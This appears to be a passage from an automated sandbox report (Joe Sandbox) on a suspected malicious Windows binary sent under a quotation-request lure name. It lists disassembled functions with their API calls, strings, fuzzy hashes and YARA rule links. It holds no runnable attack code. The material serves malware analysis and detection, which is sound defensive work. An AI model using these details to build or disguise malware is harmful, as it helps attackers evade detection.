QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0026ACD3,?,00008000), ref: 0026B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0026ACD3,?,00008000), ref: 0026B126

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 22deba0ce9623bc23dc144706344e23849ce02e2474089ad738820bb547e5f46
Instruction ID: 20af093f64cc802c5afb58dbc02c1014d284824529d63eed84d737a0084d95ad
Opcode Fuzzy Hash: 22deba0ce9623bc23dc144706344e23849ce02e2474089ad738820bb547e5f46
Instruction Fuzzy Hash: AD116D31C2152DEBCF01AFE4E998AEEBF78FF0A711F11409AD945B2185CB7096E08B55

Function 00262DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00262DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00262DD6
GetCurrentThreadId.KERNEL32 ref: 00262DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00262DE4

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 4985387bf05b283c8c457025993f5689e099a4dd489f5eadb157cbb633142ae0
Instruction ID: 4c89f40fe3564f653626f59ff8a22a3f2bf43c95e54f6b63b397fb95c2dcce0c
Opcode Fuzzy Hash: 4985387bf05b283c8c457025993f5689e099a4dd489f5eadb157cbb633142ae0
Instruction Fuzzy Hash: 4DE09271111624BBDB201F72AC0DFEB3E6CEF83BA1F500416F105D10909AA1C884C6B0

Function 00298863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00219639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00219693
Part of subcall function 00219639: SelectObject.GDI32(?,00000000), ref: 002196A2
Part of subcall function 00219639: BeginPath.GDI32(?), ref: 002196B9
Part of subcall function 00219639: SelectObject.GDI32(?,00000000), ref: 002196E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00298887
LineTo.GDI32(?,?,?), ref: 00298894
EndPath.GDI32(?), ref: 002988A4
StrokePath.GDI32(?), ref: 002988B2

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 8edec65f1e5ee9a17f442802b7487f4af4f177dbf643cd6d3708584ea01d50ca
Instruction ID: 661d4b4d2452cd7e4d3d4ca42b2b7bfbd84bc0c0791e439d78c8198db453887f
Opcode Fuzzy Hash: 8edec65f1e5ee9a17f442802b7487f4af4f177dbf643cd6d3708584ea01d50ca
Instruction Fuzzy Hash: 81F03A36052299BADB126F94BC0DFCA3B59AF06310F148002FA15650E1C7755561CFB9

Function 002198B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 002198CC
SetTextColor.GDI32(?,?), ref: 002198D6
SetBkMode.GDI32(?,00000001), ref: 002198E9
GetStockObject.GDI32(00000005), ref: 002198F1

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 3b49e3845170ce6e7b23427f98ac8c08cf39660e72660f3eb0f4b3675c8442f6
Instruction ID: a035443598a55f24440e2c58b1f480a3543a2518abde18cc965d3fad3240afd2
Opcode Fuzzy Hash: 3b49e3845170ce6e7b23427f98ac8c08cf39660e72660f3eb0f4b3675c8442f6
Instruction Fuzzy Hash: D6E06D31284280ABDB215F74BC0DBE83F60AB12336F24821AFAFA581E1C77146949B10

Function 0026162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00261634
OpenThreadToken.ADVAPI32(00000000,?,?,?,002611D9), ref: 0026163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002611D9), ref: 00261648
OpenProcessToken.ADVAPI32(00000000,?,?,?,002611D9), ref: 0026164F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 60e0fc4c8b31362915e1dcf99dced8c8094fbae1d3afa88dcc5c05ef7e170a8a
Instruction ID: 7c8d9100274f8252f2755d25a9a06aa8e0c286356fb598774224056e5dd922ec
Opcode Fuzzy Hash: 60e0fc4c8b31362915e1dcf99dced8c8094fbae1d3afa88dcc5c05ef7e170a8a
Instruction Fuzzy Hash: 4AE08635601211EBD7201FA0BE0DB463B7CAF44791F288809F745C9080D6345490C764

Function 0025D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0025D858
GetDC.USER32(00000000), ref: 0025D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0025D882
ReleaseDC.USER32(?), ref: 0025D8A3

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 4a0801a3c01ff6dd125ddca342f809c607af3c5562c9a06bcedb7942c635b3e4
Instruction ID: 3eb72b2cfe83e84c9341403d72a6538f11d78c4cbd28fac1e1a358ee227335a4
Opcode Fuzzy Hash: 4a0801a3c01ff6dd125ddca342f809c607af3c5562c9a06bcedb7942c635b3e4
Instruction Fuzzy Hash: ACE01AB1810205DFCF419FA0E80C66DBBB5FB48311F24800AE816E7250CB799951AF50

Function 0025D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0025D86C
GetDC.USER32(00000000), ref: 0025D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0025D882
ReleaseDC.USER32(?), ref: 0025D8A3

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: d52ef87df9a4e12ee1c1e7180d1e6e7495f11d691a2f77f579eb214635d6218c
Instruction ID: 62c750168ca4a692ae55fb4ea27041abc9125a37ca6c1d7415e9399c2b1b115e
Opcode Fuzzy Hash: d52ef87df9a4e12ee1c1e7180d1e6e7495f11d691a2f77f579eb214635d6218c
Instruction Fuzzy Hash: 7FE092B5810205EFCF51AFA0E80C66DBBB9BB48311F24844AE95AE7260CB799951AF50

Function 00274D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00207620: _wcslen.LIBCMT ref: 00207625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00274ED4

Strings

LPT, xrefs: 00274DFB
*, xrefs: 00274E10

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: cf548a2e084592b6ce85b5eea337c8b3013db5de7738b76f52b29f0a72b08480
Instruction ID: 724635b69fd97e77ec21f55a6a85a516c309761552f438f3df8ea5e9e3bd696a
Opcode Fuzzy Hash: cf548a2e084592b6ce85b5eea337c8b3013db5de7738b76f52b29f0a72b08480
Instruction Fuzzy Hash: CB916E75A102159FCB14EF58C484EAABBF1AF49304F18C099E80A9F7A2C771ED95CF91

Function 0022E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0022E30D

Strings

pow, xrefs: 0022E2E5, 0022E302

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 0af323eb8cc27f98809a978670a0512bc21e2df58a82a789e0e4ab70d624e328
Instruction ID: a5b3c2f230a646e66ede4c2a1f4f778f28c28f8f5343e967aa9da93d984c5e3c
Opcode Fuzzy Hash: 0af323eb8cc27f98809a978670a0512bc21e2df58a82a789e0e4ab70d624e328
Instruction Fuzzy Hash: A9518DE1A3C207F6CF31BF58E9013793B94AF40741F304999E496822E9DF348CB5AA42

Function 00287771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0025569E,00000000,?,0029CC08,?,00000000,00000000), ref: 002878DD

Part of subcall function 00206B57: _wcslen.LIBCMT ref: 00206B6A

CharUpperBuffW.USER32(0025569E,00000000,?,0029CC08,00000000,?,00000000,00000000), ref: 0028783B

Strings

<s,, xrefs: 002877C8

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s,
API String ID: 3544283678-3841622832
Opcode ID: 75ccbdc570d997da6f0be4306fb726a108b562f9597cf4d8fd5e3e2c3ed4f463
Instruction ID: 24d26f1cb357e6f69e06a80d77f8e83590183b988bd545dd6323c2f4dc5b4166
Opcode Fuzzy Hash: 75ccbdc570d997da6f0be4306fb726a108b562f9597cf4d8fd5e3e2c3ed4f463
Instruction Fuzzy Hash: 8F614B76934219AACF04FBA4CC95DFDB378BF14700B644129E542A30D2EF70AA65DFA0

Function 0021E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0021E1B1

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 765ddb4976cd9ae4664a305e1e9b03bdb49704b203ca3e6746a9872e19c4d554
Instruction ID: 42205d2b47f07103e14acf55cff0a721cd9661cb134749edeb991bf232038725
Opcode Fuzzy Hash: 765ddb4976cd9ae4664a305e1e9b03bdb49704b203ca3e6746a9872e19c4d554
Instruction Fuzzy Hash: 40513331920356DFDF18DF28C891AFABBE8EF29310F254015EC519B2D0D6309EA6CB90

Function 0021F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0021F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0021F2BB

Strings

@, xrefs: 0021F2AF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 883f58f00dd364e93c0ed71f2f05aebe60dda93bf697be8f10bd8ceaac4bb004
Instruction ID: 2b7846664409691e0c5bd1f3538b7a3d93005d473ea33ed31d1f80f758a41682
Opcode Fuzzy Hash: 883f58f00dd364e93c0ed71f2f05aebe60dda93bf697be8f10bd8ceaac4bb004
Instruction Fuzzy Hash: A55149714187459BD320AF10EC8ABABB7F8FB84300F91495DF1D9411A6EB709539CB67

Function 00285745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 002857E0
_wcslen.LIBCMT ref: 002857EC

Strings

CALLARGARRAY, xrefs: 002857E6, 002857EB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 68619729f43826ab534dd50abfa47bdf08712265a286f9e17e5e10bf22e91480
Instruction ID: 8e85b84912109a0ce8b8529239e29c655664d994320c98e6f77a6d229093fd2b
Opcode Fuzzy Hash: 68619729f43826ab534dd50abfa47bdf08712265a286f9e17e5e10bf22e91480
Instruction Fuzzy Hash: A341A035E212199FCB14EFA8C8859AEBBF5EF59310F10402AE505A7292E7709DE1CF90

Function 0027D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0027D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0027D13A

Strings

|, xrefs: 0027D10B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: fc954eb88edb8a3b8b326e9162de1bfe6ab1e4d845d4aa19fc99596c94b276b1
Instruction ID: 6760c3c8a10f1fef9dee3c8d4d938249f1ea60dbc46f531be8d1c31b86f97be8
Opcode Fuzzy Hash: fc954eb88edb8a3b8b326e9162de1bfe6ab1e4d845d4aa19fc99596c94b276b1
Instruction Fuzzy Hash: 37313971D11219ABCF15EFA4CC85EEEBFB9FF05300F404019E819A61A2D731AA66CF60

Function 0029356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00293621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0029365C

Strings

static, xrefs: 002935BC

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 7e2cea6cfd92e07af8761a6ea29cc9bf227cc8c96f9d413658e4d14954ad5478
Instruction ID: 27223ea3f96b0adaf7f2f0178b9d270527b33be08544a8206c841c36c90e24d5
Opcode Fuzzy Hash: 7e2cea6cfd92e07af8761a6ea29cc9bf227cc8c96f9d413658e4d14954ad5478
Instruction Fuzzy Hash: BF318F71120205AADB10DF68DC80EFB73ADFF89724F108619F8A5D7290DA31ADA1DB64

Function 00294537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0029461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00294634

Strings

', xrefs: 0029458E

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: fad80cb33dc140cea3d0b8774811e9ec12f774b26dcb5ade5bc353aef2ff6caf
Instruction ID: 060125bf79822bc748d2f31ac7ea3b11e1aa5131439228378c3d1a7697c62d27
Opcode Fuzzy Hash: fad80cb33dc140cea3d0b8774811e9ec12f774b26dcb5ade5bc353aef2ff6caf
Instruction Fuzzy Hash: 673137B4A1120A9FDF14DFA9C990BDA7BB9FF19300F51416AE904AB341D770A952CF90

Function 00203923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002433A2

Part of subcall function 00206B57: _wcslen.LIBCMT ref: 00206B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00203A04

Strings

Line: , xrefs: 002433EB

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 83c78bb659ab927d56237ab238b5ec1844b4bf0cd76386d2d0bbc237d1f6b921
Instruction ID: 63eeea5360f03d379867d46ee373b09189b14d54e30a257a5eadd1e38af5cf11
Opcode Fuzzy Hash: 83c78bb659ab927d56237ab238b5ec1844b4bf0cd76386d2d0bbc237d1f6b921
Instruction Fuzzy Hash: 3331E371929305AAC324EF20EC49BEBB7DCAF40710F00456BF599825D2DB709A79CBC2

Function 002931EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0029327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00293287

Strings

Combobox, xrefs: 00293249

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: acb20c0feb1355ab9d97eb3adbccbfbb9d20a4e1f5fadc9fdbd4518e39c1850f
Instruction ID: 9034d278bd93eb1f598704f7303a9b3df57575cce82e3d118df20f0400998914
Opcode Fuzzy Hash: acb20c0feb1355ab9d97eb3adbccbfbb9d20a4e1f5fadc9fdbd4518e39c1850f
Instruction Fuzzy Hash: C211D071B202097FFF25DF94DC84EBB376AEB94364F100129F91897290D6319D618B60

Function 00293710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0020600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0020604C
Part of subcall function 0020600E: GetStockObject.GDI32(00000011), ref: 00206060
Part of subcall function 0020600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0020606A

GetWindowRect.USER32(00000000,?), ref: 0029377A
